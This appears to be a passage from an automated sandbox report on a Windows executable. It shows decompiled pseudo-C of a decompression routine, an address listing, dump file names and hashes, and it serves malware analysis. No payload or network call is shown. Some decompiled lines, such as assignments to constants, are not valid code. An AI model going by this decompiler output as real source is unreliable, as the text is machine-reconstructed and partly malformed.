								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406398
0x00406398
0x0040639c
0x00406453
0x00406456
0x00406462
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x004063a2
0x004063a6
0x004068e7
0x004068e7
0x004068ea
0x004068ee
0x004068ee
0x004063ac
0x004063b2
0x004063b5
0x004063b9
0x004063bc
0x004063c0
0x00406886
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x00000000
0x004068e3
0x004063c6
0x004063c9
0x004063cf
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x004063fa
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
